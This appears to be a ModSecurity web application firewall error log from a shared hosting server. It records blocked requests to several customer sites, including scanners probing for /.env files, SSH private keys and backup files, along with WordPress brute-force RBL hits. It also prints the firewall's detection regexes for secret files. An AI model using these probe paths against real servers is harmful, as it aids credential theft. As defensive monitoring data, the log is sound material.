[Tue May 26 15:46:14.198267 2026] [security2:error] [pid 745492:tid 745749] [client 103.153.130.62:55302] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVy7omEQglTmoWcfxJwCQAAAQE"]
[Tue May 26 15:46:14.539930 2026] [security2:error] [pid 745492:tid 745660] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVy7omEQglTmoWcfxJwEgAAAKg"], referer: https://www.anujtradingco.com/
[Tue May 26 15:46:15.156326 2026] [http2:info] [pid 747840:tid 747840] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:46:15.292357 2026] [security2:error] [pid 745492:tid 745658] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVy74mEQglTmoWcfxJwMAAAAKY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157062&moderation-hash=c23f0f591a039229d82b3f206724dd57
[Tue May 26 15:46:15.426483 2026] [security2:error] [pid 745492:tid 745704] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy7omEQglTmoWcfxJwJgAAANQ"]
[Tue May 26 15:46:16.496179 2026] [security2:error] [pid 745492:tid 745747] [client 88.151.32.54:56762] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVy8ImEQglTmoWcfxJwUwAAAP8"]
[Tue May 26 15:46:16.499469 2026] [security2:error] [pid 745492:tid 745727] [client 88.151.32.54:56742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/.env.old"] [unique_id "ahVy8ImEQglTmoWcfxJwVwAAAOs"]
[Tue May 26 15:46:16.499850 2026] [security2:error] [pid 745492:tid 745703] [client 88.151.32.54:56758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/app/.env"] [unique_id "ahVy8ImEQglTmoWcfxJwWQAAANM"]
[Tue May 26 15:46:16.503300 2026] [security2:error] [pid 745492:tid 745649] [client 88.151.32.54:56728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahVy8ImEQglTmoWcfxJwXwAAAJ0"]
[Tue May 26 15:46:16.503827 2026] [security2:error] [pid 745492:tid 745725] [client 88.151.32.54:56760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/public/.env"] [unique_id "ahVy8ImEQglTmoWcfxJwYAAAAOk"]
[Tue May 26 15:46:16.504976 2026] [security2:error] [pid 745492:tid 745650] [client 88.151.32.54:56756] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/backend/.env"] [unique_id "ahVy8ImEQglTmoWcfxJwZgAAAJ4"]
[Tue May 26 15:46:16.506577 2026] [security2:error] [pid 745492:tid 745665] [client 88.151.32.54:56738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/.env.backup"] [unique_id "ahVy8ImEQglTmoWcfxJwZQAAAK0"]
[Tue May 26 15:46:16.506609 2026] [security2:error] [pid 745492:tid 745639] [client 88.151.32.54:56740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/.env.bak"] [unique_id "ahVy8ImEQglTmoWcfxJwZwAAAJM"]
[Tue May 26 15:46:16.509844 2026] [security2:error] [pid 745492:tid 745699] [client 88.151.32.54:56766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVy8ImEQglTmoWcfxJwYgAAAM8"]
[Tue May 26 15:46:16.510472 2026] [security2:error] [pid 745492:tid 745664] [client 88.151.32.54:56752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/api/.env"] [unique_id "ahVy8ImEQglTmoWcfxJwfAAAAKw"]
[Tue May 26 15:46:17.185189 2026] [security2:error] [pid 747840:tid 748014] [client 85.208.96.205:34188] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVy8Ym6MwAuYuZKxvnhqAAAATY"]
[Tue May 26 15:46:17.185397 2026] [security2:error] [pid 747840:tid 748014] [client 85.208.96.205:34188] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVy8Ym6MwAuYuZKxvnhqAAAATY"]
[Tue May 26 15:46:17.459518 2026] [security2:error] [pid 745492:tid 745682] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy8YmEQglTmoWcfxJwoQAAAL4"]
[Tue May 26 15:46:17.736104 2026] [security2:error] [pid 747840:tid 748069] [client 114.119.154.200:36515] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kexcouriers.com"] [uri "/faq.html"] [unique_id "ahVy8Ym6MwAuYuZKxvnhswAAAW0"], referer: https://kexcouriers.com/tracking.html
[Tue May 26 15:46:19.046597 2026] [security2:error] [pid 747840:tid 748079] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy8om6MwAuYuZKxvnh9AAAAXc"]
[Tue May 26 15:46:19.792802 2026] [security2:error] [pid 747840:tid 748020] [client 143.110.243.118:54284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/amigo.php"] [unique_id "ahVy84m6MwAuYuZKxvniBgAAATw"]
[Tue May 26 15:46:19.901982 2026] [security2:error] [pid 747840:tid 748091] [client 223.123.35.44:36211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVy84m6MwAuYuZKxvniAgAAAYM"]
[Tue May 26 15:46:19.902135 2026] [security2:error] [pid 747840:tid 748091] [client 223.123.35.44:36211] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVy84m6MwAuYuZKxvniAgAAAYM"]
[Tue May 26 15:46:21.139754 2026] [security2:error] [pid 745492:tid 745730] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy9ImEQglTmoWcfxJw3wAAAO4"]
[Tue May 26 15:46:23.726120 2026] [security2:error] [pid 745492:tid 745749] [client 49.51.132.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVy94mEQglTmoWcfxJxFAAAAQE"]
[Tue May 26 15:46:23.896345 2026] [security2:error] [pid 747840:tid 747994] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy94m6MwAuYuZKxvniPAAAASI"]
[Tue May 26 15:46:24.835782 2026] [security2:error] [pid 745492:tid 745734] [client 103.153.130.62:60005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVy-ImEQglTmoWcfxJxRAAAAPI"]
[Tue May 26 15:46:24.835903 2026] [security2:error] [pid 745492:tid 745734] [client 103.153.130.62:60005] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVy-ImEQglTmoWcfxJxRAAAAPI"]
[Tue May 26 15:46:25.640875 2026] [security2:error] [pid 745492:tid 745647] [client 49.51.132.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVy-YmEQglTmoWcfxJxWwAAAJs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1412554&moderation-hash=4ab568bab0985158a18bcd6babb28ecb
[Tue May 26 15:46:25.949168 2026] [security2:error] [pid 747840:tid 748059] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy-Ym6MwAuYuZKxvniagAAAWM"]
[Tue May 26 15:46:26.319636 2026] [security2:error] [pid 745492:tid 745684] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwcgAAAMA"]
[Tue May 26 15:46:27.281120 2026] [security2:error] [pid 745492:tid 745663] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwigAAAKs"]
[Tue May 26 15:46:27.334926 2026] [security2:error] [pid 745492:tid 745748] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwjQAAAQA"]
[Tue May 26 15:46:27.369533 2026] [security2:error] [pid 747840:tid 748015] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8Im6MwAuYuZKxvnhmAAAATc"]
[Tue May 26 15:46:28.125249 2026] [security2:error] [pid 747840:tid 748061] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy-4m6MwAuYuZKxvniigAAAWU"]
[Tue May 26 15:46:28.330315 2026] [security2:error] [pid 747840:tid 748013] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8Im6MwAuYuZKxvnhlgAAATU"]
[Tue May 26 15:46:29.289060 2026] [security2:error] [pid 745492:tid 745628] [client 88.151.32.54:56786] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwdQAAAIg"]
[Tue May 26 15:46:29.332741 2026] [security2:error] [pid 745492:tid 745690] [client 88.151.32.54:56784] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwcwAAAMY"]
[Tue May 26 15:46:30.151452 2026] [security2:error] [pid 747840:tid 747988] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy_Ym6MwAuYuZKxvnirQAAARw"]
[Tue May 26 15:46:30.315106 2026] [security2:error] [pid 745492:tid 745729] [client 88.151.32.54:56782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwbgAAAO0"]
[Tue May 26 15:46:30.395891 2026] [security2:error] [pid 745492:tid 745680] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwkAAAALw"]
[Tue May 26 15:46:30.401844 2026] [security2:error] [pid 745492:tid 745662] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwlwAAAKo"]
[Tue May 26 15:46:31.182104 2026] [security2:error] [pid 745492:tid 745742] [client 127.0.0.1:38416] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "127.0.0.1"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVy_4mEQglTmoWcfxJxjgAAAPo"]
[Tue May 26 15:46:31.182124 2026] [security2:error] [pid 747840:tid 748078] [client 127.0.0.1:38404] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.pdrwebsolutions.cloud"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVy_4m6MwAuYuZKxvni0gAAAXY"]
[Tue May 26 15:46:31.182302 2026] [security2:error] [pid 745492:tid 745739] [client 74.7.175.136:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.pdrwebsolutions.cloud"] [uri "/robots.txt"] [unique_id "ahVy_4mEQglTmoWcfxJxjQAA92g"]
[Tue May 26 15:46:32.257447 2026] [security2:error] [pid 747840:tid 748026] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy_4m6MwAuYuZKxvni3gAAAUI"]
[Tue May 26 15:46:32.368267 2026] [security2:error] [pid 745492:tid 745644] [client 88.151.32.54:56776] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwagAAAJg"]
[Tue May 26 15:46:32.379834 2026] [security2:error] [pid 747840:tid 748004] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8Im6MwAuYuZKxvnhlwAAASw"]
[Tue May 26 15:46:32.755088 2026] [security2:error] [pid 747840:tid 748073] [client 176.65.139.232:55986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVzAIm6MwAuYuZKxvni7gAAAXE"]
[Tue May 26 15:46:32.918840 2026] [security2:error] [pid 747840:tid 748066] [client 176.65.139.236:33604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.vcresco-usa.vcresco.com"] [uri "/.env"] [unique_id "ahVzAIm6MwAuYuZKxvni8gAAAWo"]
[Tue May 26 15:46:33.307020 2026] [security2:error] [pid 745492:tid 745646] [client 88.151.32.54:56794] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwfgAAAJo"]
[Tue May 26 15:46:33.690267 2026] [security2:error] [pid 747840:tid 747989] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzAYm6MwAuYuZKxvni_AAAAR0"]
[Tue May 26 15:46:34.094583 2026] [security2:error] [pid 747840:tid 748008] [client 114.119.129.92:55599] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVzAom6MwAuYuZKxvnjFwAAATA"], referer: http://haddingtonwines.com/cart?remove_item=bdf3fd65c81469f9b74cedd497f2f9ce
[Tue May 26 15:46:34.392593 2026] [security2:error] [pid 747840:tid 747929] [remote 54.38.29.86:36218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVzAom6MwAuYuZKxvnjGAABSlg"]
[Tue May 26 15:46:35.284337 2026] [security2:error] [pid 747840:tid 748000] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8Im6MwAuYuZKxvnhlAAAASg"]
[Tue May 26 15:46:35.295493 2026] [security2:error] [pid 745492:tid 745673] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwhAAAALU"]
[Tue May 26 15:46:35.391947 2026] [security2:error] [pid 745492:tid 745681] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy8ImEQglTmoWcfxJwhQAAAL0"]
[Tue May 26 15:46:35.522739 2026] [security2:error] [pid 747840:tid 748009] [client 103.153.130.62:61760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzA4m6MwAuYuZKxvnjMwAAATE"]
